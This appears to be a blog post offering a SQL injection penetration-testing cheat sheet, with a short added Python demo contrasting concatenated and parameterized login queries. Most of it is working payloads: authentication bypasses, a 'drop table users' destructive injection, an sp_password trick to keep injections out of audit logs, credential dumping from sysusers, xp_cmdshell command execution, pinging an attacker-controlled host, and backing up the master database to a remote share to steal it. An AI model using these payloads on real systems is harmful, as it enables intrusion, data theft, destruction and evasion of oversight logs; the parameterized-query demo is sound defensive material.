Bojensen Blogs

SQL-Injection Penetration Test

Generic – Bypass Authentication

The following payloads are generally applied to login forms with a username and password. Correctly performing these attacks will allow you to authenticate to the web application (unless otherwise stated).

realusername' OR 1=1--
Authenticate as a real user without requiring a password.

' OR '' = '
Allows authentication without a valid username.

admin'--
Authenticate as user admin without a password.

' union select 1, 'user', 'pass' 1--
Requires knowledge of column names.

'; drop table users--
DANGEROUS! This drops the table holding the user accounts if that table is named 'users'.
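As an added example (not from the original post), the following Python/SQLite login check is written twice, once with string concatenation and once with bound parameters, to show why the first three payloads above succeed against concatenated SQL and fail once the input is passed as data. The table, the accounts and the function names are constructed for this demonstration.

```python
import sqlite3

# Constructed sample database: two accounts, plaintext passwords only for brevity.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'correct horse battery staple')")
    conn.execute("INSERT INTO users VALUES ('alice', 's3cret')")
    conn.commit()
    return conn

def login_vulnerable(conn, username, password):
    # The user's input is spliced into the SQL text, so a quote ends the string
    # literal and a trailing -- comments out the password check.
    sql = ("SELECT username FROM users WHERE username = '" + username +
           "' AND password = '" + password + "'")
    row = conn.execute(sql).fetchone()
    return row[0] if row else None

def login_safe(conn, username, password):
    # Bound parameters are sent as values; quotes and -- inside them are never
    # interpreted as SQL, so the WHERE clause keeps both conditions intact.
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    row = conn.execute(sql, (username, password)).fetchone()
    return row[0] if row else None

def compare(conn, username, password):
    # Returns (vulnerable_result, safe_result) for one login attempt.
    return login_vulnerable(conn, username, password), login_safe(conn, username, password)

if __name__ == "__main__":
    db = make_db()
    for user, pw in [("alice", "s3cret"), ("admin'--", "x"),
                     ("alice' OR 1=1--", "x"), ("' OR '' = '", "' OR '' = '")]:
        print(repr(user), repr(pw), "->", compare(db, user, pw))
```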

Microsoft SQL

'admin --sp_password
sp_traceXXX audit evasion. The sp_password keyword prevents clear-text passwords from being stored in the log files; appending it after your comment (--) can therefore prevent SQL Injection queries from being logged.

  • select @@version
    View database version.
  • select @@servername
    Misc. information disclosure
  • select @@microsoftversion
    Misc. information disclosure
  • select * from master..sysservers
    Misc. information disclosure
  • select * from sysusers
    View database usernames and passwords.
  • exec master..xp_cmdshell 'ipconfig+/all'
    Misc. command execution with xp_cmdshell.
  • exec master..xp_cmdshell 'net+view'
    Misc. command execution with xp_cmdshell.
  • exec master..xp_cmdshell 'net+users'
    Misc. command execution with xp_cmdshell.
  • exec master..xp_cmdshell 'ping+system-controlled-by-attacker'
    Misc. command execution with xp_cmdshell. This is useful for blind SQL Injection tests (where no results are displayed).
  • BACKUP database master to disks='\\{IP}\{sharename}\backupdb.dat'
    Back up the entire database to a file. This attack can be used to steal a database.
  • create table myfile (line varchar(8000))" bulk insert foo from 'c:\inetpub\wwwroot\auth.asp'" select * from myfile"--
    Reading files on the filesystem.
  • xp_servicecontrol (START or STOP)
    Start and stop Windows Services.
  • str1 + str2 OR n+n
    Concat strings for blind SQL Injection tests.